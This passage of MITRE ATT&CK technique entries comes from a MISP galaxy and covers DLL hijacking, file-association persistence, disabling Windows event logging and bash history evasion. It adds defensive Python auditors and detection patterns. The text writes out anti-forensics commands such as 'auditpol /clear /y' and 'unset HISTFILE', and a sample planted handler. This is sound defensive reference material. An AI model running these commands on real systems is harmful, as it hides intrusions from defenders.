https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/

https://ptylu.github.io/content/report/report.html?report=25

https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947

https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html

https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/

https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/

https://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis

https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem

https://www.mandiant.com/resources/chasing-avaddon-ransomware

https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/

Compromise Software Supply Chain - T1195.002

Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002"

Table 5483. Table References

Links

https://attack.mitre.org/techniques/T1195/002

https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities

https://www.commandfive.com/papers/C5_APT_SKHack.pdf

Make and Impersonate Token - T1134.003

Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system, the adversary can create a logon session for the user using the LogonUser function. The function will return a copy of the new session’s access token, and the adversary can use SetThreadToken to assign the token to a thread.

This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.

The tag is: misp-galaxy:mitre-attack-pattern="Make and Impersonate Token - T1134.003"

Table 5484. Table References

Links

https://attack.mitre.org/techniques/T1134/003

https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing

Compromise Hardware Supply Chain - T1195.003

Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Hardware Supply Chain - T1195.003"

Table 5485. Table References

Links

https://attack.mitre.org/techniques/T1195/003

Change Default File Association - T1546.001

Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</code>. For example:

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>

The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012)
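The lookup chain above (extension key, ProgID, then the shell action command keys) is easy to audit offline from a registry export. The following Python is an added example written for this page, not code from MITRE or from the MISP project: it parses a constructed <code>.reg</code>-style dump, resolves the handler commands for an extension, and applies a few heuristics of its own (interpreter as handler, references to user-writable locations, chained commands) to flag a planted handler. The sample registry content and the heuristic labels are this example's own; the untrusted-location markers are an assumption about a default Windows layout.

```python
"""Resolve Windows file-association handler commands from a .reg export and flag suspicious ones."""
import re
from typing import Dict, List

# Constructed sample in the shape of `reg export HKEY_CLASSES_ROOT`; the .log handler is the
# planted one (cmd.exe chaining a user-writable payload before the real viewer). Not real data.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="%SystemRoot%\\system32\\NOTEPAD.EXE %1"

[HKEY_CLASSES_ROOT\txtfile\shell\print\command]
@="%SystemRoot%\\system32\\NOTEPAD.EXE /p %1"

[HKEY_CLASSES_ROOT\.log]
@="logfile"

[HKEY_CLASSES_ROOT\logfile\shell\open\command]
@="cmd.exe /c start \"\" \"%APPDATA%\\svc\\update.exe\" & notepad.exe \"%1\""
'''

SECTION_RE = re.compile(r'^\[(?P<key>[^\]]+)\]\s*$')
DEFAULT_RE = re.compile(r'^@="(?P<val>.*)"\s*$')


def parse_reg_export(text: str) -> Dict[str, str]:
    """Map each key path (lower-cased) to its (Default) string value, undoing .reg escaping."""
    values: Dict[str, str] = {}
    key = None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            key = m.group('key').lower()
            continue
        m = DEFAULT_RE.match(line)
        if m and key:
            values[key] = re.sub(r'\\(.)', r'\1', m.group('val'))  # \\ -> \ and \" -> "
    return values


def handler_commands(values: Dict[str, str], ext: str) -> Dict[str, str]:
    """Follow HKCR\\.<ext> -> ProgID -> HKCR\\<ProgID>\\shell\\<action>\\command."""
    progid = values.get(f'hkey_classes_root\\{ext.lower()}')
    if not progid:
        return {}
    prefix = f'hkey_classes_root\\{progid.lower()}\\shell\\'
    suffix = '\\command'
    return {k[len(prefix):-len(suffix)]: v
            for k, v in values.items() if k.startswith(prefix) and k.endswith(suffix)}


INTERPRETERS = {'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe',
                'mshta.exe', 'rundll32.exe'}
# Assumed default layout: locations a standard user can write to, and the system directories.
USER_WRITABLE = ('%appdata%', '%localappdata%', '%temp%', '%tmp%', '%userprofile%',
                 '%public%', 'c:\\users\\')
TRUSTED_DIRS = ('%systemroot%', '%windir%', '%programfiles%', '%programfiles(x86)%',
                'c:\\windows\\', 'c:\\program files')


def first_executable(command: str) -> str:
    """The program a shell command line starts with, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split()[0] if command else ''


def assess_command(command: str) -> List[str]:
    """Heuristics (this example's own, not Windows policy): why a handler deserves a look."""
    exe = first_executable(command).lower()
    low = command.lower()
    reasons = []
    if exe.rsplit('\\', 1)[-1] in INTERPRETERS:
        reasons.append('interpreter')
    if any(marker in low for marker in USER_WRITABLE):
        reasons.append('user-writable path')
    if '\\' in exe and not exe.startswith(TRUSTED_DIRS):
        reasons.append('executable outside system directories')
    if ' & ' in low or '&&' in low or ' | ' in low:
        reasons.append('chained command')
    return reasons


def audit_extension(values: Dict[str, str], ext: str) -> Dict[str, List[str]]:
    """Action name -> list of reasons (empty when the handler looks normal)."""
    return {action: assess_command(cmd) for action, cmd in handler_commands(values, ext).items()}
```

Run on a real host, the same functions take the output of <code>reg export HKEY_CLASSES_ROOT</code>; per-user overrides under <code>HKEY_CURRENT_USER\Software\Classes</code> take precedence over the machine-wide keys and should be exported and checked the same way.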

The tag is: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001"

Table 5486. Table References

Links

http://msdn.microsoft.com/en-us/library/bb166549.aspx

https://attack.mitre.org/techniques/T1546/001

https://docs.microsoft.com/windows-server/administration/windows-commands/assoc

https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd

Hidden Files and Directories - T1564.001

Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls -a</code> for Linux and macOS).

On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.

Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.

Adversaries can use this to their advantage to hide files and folders anywhere on the system, evading a typical user or system analysis that does not include hidden files.
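The three hiding mechanisms named above (a leading dot, the macOS <code>UF_HIDDEN</code> flag, and the Windows hidden attribute) are all visible to a scanner that asks for them explicitly. The following Python is an added example for this page, not MITRE or MISP code: it walks a directory and reports every entry together with the reason it would be hidden on the current platform, using only the standard library. The fixture tree it builds in a temporary directory is constructed for the demonstration.

```python
"""Find entries a casual listing hides: dotfiles, macOS UF_HIDDEN, Windows hidden attribute."""
import os
import stat
import tempfile
from typing import Dict, List

FILE_ATTRIBUTE_HIDDEN = getattr(stat, 'FILE_ATTRIBUTE_HIDDEN', 0x2)   # the `attrib +h` bit
UF_HIDDEN = getattr(stat, 'UF_HIDDEN', 0x8000)                        # BSD/macOS chflags hidden


def hidden_reasons(path: str) -> List[str]:
    """Why `path` would be hidden on this platform; empty list if it is visible."""
    reasons = []
    if os.path.basename(path).startswith('.'):
        reasons.append('dotfile')                      # skipped by Finder and plain `ls`
    st = os.lstat(path)                                # lstat: never follow symlinks while scanning
    if getattr(st, 'st_flags', 0) & UF_HIDDEN:         # st_flags exists on BSD/macOS only
        reasons.append('UF_HIDDEN')                    # hidden from Finder, still visible to `ls`
    if getattr(st, 'st_file_attributes', 0) & FILE_ATTRIBUTE_HIDDEN:   # Windows only
        reasons.append('FILE_ATTRIBUTE_HIDDEN')        # what `dir` omits without /a
    return reasons


def scan_hidden(root: str) -> Dict[str, List[str]]:
    """Map every hidden entry under root (path relative to root) to the reasons it is hidden."""
    found: Dict[str, List[str]] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            reasons = hidden_reasons(full)
            if reasons:
                found[os.path.relpath(full, root)] = reasons
    return found


def demo() -> Dict[str, List[str]]:
    """Constructed tree: a .ssh directory (as the text mentions), a .bash_history, one visible file."""
    root = tempfile.mkdtemp(prefix='hidden-demo-')
    os.makedirs(os.path.join(root, '.ssh'))
    for rel, content in (('.ssh/known_hosts', 'host ssh-ed25519 AAAA...\n'),
                         ('.bash_history', 'id\n'),
                         ('report.txt', 'visible\n')):
        with open(os.path.join(root, *rel.split('/')), 'w') as fh:
            fh.write(content)
    return scan_hidden(root)
```

Note that <code>known_hosts</code> itself is not reported: it is only unreachable because its parent directory is hidden, which is exactly why a scan has to descend into hidden directories rather than skip them.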

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001"

Table 5487. Table References

Links

https://attack.mitre.org/techniques/T1564/001

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

DLL Search Order Hijacking - T1574.001

Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.

There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)

Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)

If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
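The order in which Windows probes directories decides whether planting a same-named DLL works, so it is worth modelling. The following Python is an added example for this page, not MITRE or MISP code: it encodes the default search order (application directory, system directories, current directory, then PATH with SafeDllSearchMode on; current directory second with it off), honours the KnownDLLs short-circuit, and lists the user-writable directories that are probed before the legitimate copy is found, or every writable directory when the DLL exists nowhere (a phantom load). The host layout, file names and writable directories are a constructed fixture.

```python
"""Model the Windows DLL search order and list where a standard user could plant a hijack."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

SYSTEM_DIRS = [r'C:\Windows\System32', r'C:\Windows\System', r'C:\Windows']


@dataclass
class Host:
    """Constructed view of a host (not a real system): directory -> lower-case file names it
    contains, the directories a non-admin can write to, and the KnownDLLs names."""
    files: Dict[str, Set[str]]
    writable: Set[str]
    known_dlls: Set[str] = field(default_factory=set)


def search_order(app_dir: str, cwd: str, path_dirs: List[str], safe_search: bool = True) -> List[str]:
    """Directories probed, in order, for an unqualified DLL name. With SafeDllSearchMode on
    (the default) the current directory is probed after the system directories; with it off
    it comes straight after the application directory."""
    if safe_search:
        return [app_dir] + SYSTEM_DIRS + [cwd] + path_dirs
    return [app_dir, cwd] + SYSTEM_DIRS + path_dirs


def resolve(host: Host, dll: str, order: List[str]) -> Optional[str]:
    """First directory in `order` holding `dll`; KnownDLLs come from the system directory
    without any search at all."""
    dll = dll.lower()
    if dll in host.known_dlls:
        return SYSTEM_DIRS[0]
    for directory in order:
        if dll in host.files.get(directory, set()):
            return directory
    return None


def hijack_opportunities(host: Host, dll: str, order: List[str]) -> List[str]:
    """Writable directories probed before the legitimate copy is found. If the DLL exists
    nowhere (a 'phantom' load the program tolerates), every writable directory qualifies."""
    dll = dll.lower()
    if dll in host.known_dlls:
        return []
    legit = resolve(host, dll, order)
    hits = []
    for directory in order:
        if directory == legit:
            break
        if directory in host.writable:
            hits.append(directory)
    return hits


def demo_host() -> Host:
    """Constructed fixture: app under Program Files, user downloads and temp writable."""
    return Host(
        files={
            SYSTEM_DIRS[0]: {'kernel32.dll', 'version.dll', 'dwmapi.dll'},
            r'C:\Program Files\Vendor\App': {'app.exe'},
        },
        writable={r'C:\Users\alice\Downloads', r'C:\Users\alice\AppData\Local\Temp'},
        known_dlls={'kernel32.dll'},
    )
```

Two things the model makes visible: the same DLL is safe under SafeDllSearchMode and hijackable from the current directory without it, and a DLL the program asks for but never ships is hijackable from any writable directory on the path regardless of the mode. Programs close both gaps by loading system libraries with fully qualified paths or restricting the search with <code>SetDefaultDllDirectories</code>, and defenders find candidates by watching for DLL loads from user-writable directories.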

The tag is: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001"

Table 5488. Table References

Links

https://attack.mitre.org/techniques/T1574/001

https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637

https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN

https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN

https://msdn.microsoft.com/en-US/library/aa375365

https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html

https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html

https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html

https://www.owasp.org/index.php/Binary_planting

Services File Permissions Weakness - T1574.010

Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Services File Permissions Weakness - T1574.010"

Table 5489. Table References

Links

https://attack.mitre.org/techniques/T1574/010

Exfiltration to Code Repository - T1567.001

Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs is often over HTTPS, which gives the adversary an additional level of protection.

Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001"

Table 5490. Table References

Links

https://attack.mitre.org/techniques/T1567/001

Network Address Translation Traversal - T1599.001

Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)

When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.

Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities.

The tag is: misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001"

Table 5491. Table References

Links

https://attack.mitre.org/techniques/T1599/001

https://tools.ietf.org/html/rfc1918

Disable Windows Event Logging - T1562.002

Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.

The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to <code>Security Settings\Local Policies\Audit Policy</code> for basic audit policy settings or <code>Security Settings\Advanced Audit Policy Configuration</code> for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) <code>auditpol.exe</code> may also be used to set audit policies.(Citation: auditpol)

Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the <code>Set-Service -Name EventLog -Status Stopped</code> or <code>sc config eventlog start= disabled</code> commands (<code>sc</code> requires the space after <code>start=</code>), followed by manually stopping the service using <code>Stop-Service -Name EventLog</code>.(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog</code> then restarting the system for the change to take effect.(Citation: disable_win_evt_logging)

There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security</code>, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System</code> and <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application</code> to disable the entire EventLog.(Citation: disable_win_evt_logging)

Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:"Account Logon" /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1562.002_redcanaryco)

By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.
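Because the <code>auditpol</code> and Autologger changes described above leave the machine looking healthy, the practical check is to compare the effective policy against a baseline. The following Python is an added example for this page, not MITRE or MISP code: it parses text in the shape of <code>auditpol /get /category:*</code> output, reports subcategories that fall below a baseline, and flags Autologger sessions whose <code>Start</code> value has been set to 0. The sample output, the baseline and the mapping of Start values are constructed for the demonstration; the baseline in particular is an assumption, not a recommendation.

```python
"""Compare `auditpol /get /category:*` output against a baseline and spot disabled Autologger sessions."""
import re
from typing import Dict, List, Tuple

# Constructed output in the shape auditpol prints. Here Account Logon and Detailed Tracking have
# been turned off, as `auditpol /set /category:"Account Logon" /success:disable /failure:disable`
# would do for the former.
SAMPLE_AUDITPOL = """System audit policy
Category/Subcategory                      Setting
System
  Security System Extension               No Auditing
  Security State Change                   Success
Logon/Logout
  Logon                                   Success and Failure
  Logoff                                  Success
Detailed Tracking
  Process Creation                        No Auditing
  Process Termination                     No Auditing
Policy Change
  Audit Policy Change                     Success and Failure
Account Logon
  Credential Validation                   No Auditing
  Kerberos Authentication Service         No Auditing
"""

# Minimal baseline for this example (an assumption; organisations set their own).
BASELINE: Dict[str, str] = {
    'Security State Change': 'Success',
    'Logon': 'Success and Failure',
    'Process Creation': 'Success',
    'Audit Policy Change': 'Success and Failure',
    'Credential Validation': 'Success and Failure',
}

# Subcategory lines are indented by two spaces; category headers are not and are skipped.
SUBCATEGORY_RE = re.compile(
    r'^\s{2}(?P<name>\S.*?)\s{2,}(?P<setting>No Auditing|Success and Failure|Success|Failure)\s*$')


def parse_auditpol(text: str) -> Dict[str, str]:
    """Subcategory name -> effective setting."""
    return {m.group('name'): m.group('setting')
            for m in map(SUBCATEGORY_RE.match, text.splitlines()) if m}


def satisfies(actual: str, expected: str) -> bool:
    """'Success and Failure' covers a baseline of either half; nothing else covers it."""
    if expected == 'Success and Failure':
        return actual == expected
    return actual in (expected, 'Success and Failure')


def policy_gaps(text: str, baseline: Dict[str, str] = BASELINE) -> Dict[str, Tuple[str, str]]:
    """Subcategories below baseline, as name -> (expected, actual); an absent line counts as off."""
    policy = parse_auditpol(text)
    gaps = {}
    for name, expected in baseline.items():
        actual = policy.get(name, 'No Auditing')
        if not satisfies(actual, expected):
            gaps[name] = (expected, actual)
    return gaps


# HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\<session>\Start: 1 starts the session at
# boot, 0 leaves it stopped, which is the registry change the text describes.
AUTOLOGGER_SESSIONS = ('EventLog-Application', 'EventLog-Security', 'EventLog-System')


def disabled_autologgers(start_values: Dict[str, int]) -> List[str]:
    """Sessions whose Start value is 0; input is the exported values (e.g. from `reg query`)."""
    return [name for name in AUTOLOGGER_SESSIONS if start_values.get(name, 1) == 0]
```

A gap report from a host that was fine yesterday is itself a signal: event 4719 (audit policy changed) should appear at the moment the policy moved, and its absence while the policy has changed points at the EventLog service or its Autologger session having been stopped first.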

The tag is: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002"

Table 5492. Table References

Links

https://attack.mitre.org/techniques/T1562/002

https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md

https://ptylu.github.io/content/report/report.html?report=25

https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html

https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c

https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040

https://www.coretechnologies.com/blog/windows-services/eventlog/

https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/

Impair Command History Logging - T1562.003

Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they’ve done.

On Linux and macOS, command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When the interactive shell exits (for example when the user logs off), this information is flushed to a file in the user’s home directory called <code>~/.bash_history</code>. The <code>HISTCONTROL</code> environment variable controls what is saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when the shell exits. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected.

Adversaries may clear the history environment variable (<code>unset HISTFILE</code>) or set the command history size to zero (<code>export HISTFILESIZE=0</code>) to prevent logging of commands. Additionally, <code>HISTCONTROL</code> can be configured to ignore commands that start with a space by simply setting it to "ignorespace". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
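The rules above are mechanical, so they can be replayed to see exactly which commands survive and which rc-file settings defeat history altogether. The following Python is an added example for this page, not MITRE or MISP code: one function emulates bash's <code>HISTCONTROL</code> handling (<code>ignorespace</code>, <code>ignoredups</code>, <code>ignoreboth</code>, <code>erasedups</code>) over a list of commands, a second applies the <code>HISTFILE</code>/<code>HISTFILESIZE</code> rules at exit, and a third scans an rc file for the settings the text names. The sample <code>.bashrc</code> fragment and the finding labels are constructed for the demonstration.

```python
"""Emulate bash's HISTCONTROL/HISTFILE handling and scan an rc file for history-evasion settings."""
import re
from typing import List, Optional, Tuple


def bash_history_keep(commands: List[str], histcontrol: str = '') -> List[str]:
    """Commands bash keeps in its history list. ignorespace drops lines beginning with a space,
    ignoredups drops a line identical to the previous kept one, ignoreboth means both, and
    erasedups removes earlier copies before appending (bash(1), HISTCONTROL)."""
    opts = set(histcontrol.split(':')) if histcontrol else set()
    if 'ignoreboth' in opts:
        opts |= {'ignorespace', 'ignoredups'}
    kept: List[str] = []
    for cmd in commands:
        if 'ignorespace' in opts and cmd.startswith(' '):
            continue
        if 'ignoredups' in opts and kept and kept[-1] == cmd:
            continue
        if 'erasedups' in opts:
            kept = [c for c in kept if c != cmd]
        kept.append(cmd)
    return kept


def history_written(kept: List[str], histfile: Optional[str], histfilesize: Optional[int]) -> List[str]:
    """What reaches disk when the shell exits: nothing if HISTFILE is unset or empty; at most
    HISTFILESIZE lines if it is set, and HISTFILESIZE=0 truncates the file to nothing."""
    if not histfile:
        return []
    if histfilesize is None:
        return kept
    return kept[-histfilesize:] if histfilesize > 0 else []


# Patterns an rc-file review looks for; the labels are this example's own wording.
EVASION_PATTERNS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r'^\s*unset\s+HISTFILE\b'), 'HISTFILE unset'),
    (re.compile(r'^\s*(?:export\s+)?HISTFILE=(?:""|\'\'|/dev/null)?\s*$'), 'HISTFILE emptied'),
    (re.compile(r'^\s*(?:export\s+)?HISTFILESIZE=0\b'), 'HISTFILESIZE=0'),
    (re.compile(r'^\s*(?:export\s+)?HISTSIZE=0\b'), 'HISTSIZE=0'),
    (re.compile(r'^\s*set\s+\+o\s+history\b'), 'set +o history'),
    (re.compile(r'^\s*(?:export\s+)?HISTCONTROL=.*ignore(?:space|both)'),
     'HISTCONTROL ignores space-prefixed commands'),
]


def scan_rc(text: str) -> List[Tuple[int, str]]:
    """(line number, label) for every line matching an evasion pattern."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern, label in EVASION_PATTERNS:
            if pattern.search(line):
                hits.append((lineno, label))
    return hits


# Constructed ~/.bashrc fragment for the demo (not from a real host).
SAMPLE_BASHRC = """# shell setup
export HISTCONTROL=ignoreboth
unset HISTFILE
export HISTFILESIZE=0
alias ll='ls -la'
"""
```

The <code>HISTCONTROL</code> finding is noisy on distributions that ship <code>ignoreboth</code> by default, which is why shell history should be treated as a convenience rather than an audit source: process execution logging (auditd, or the shell's own syslog build option) records the space-prefixed command that history silently drops.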

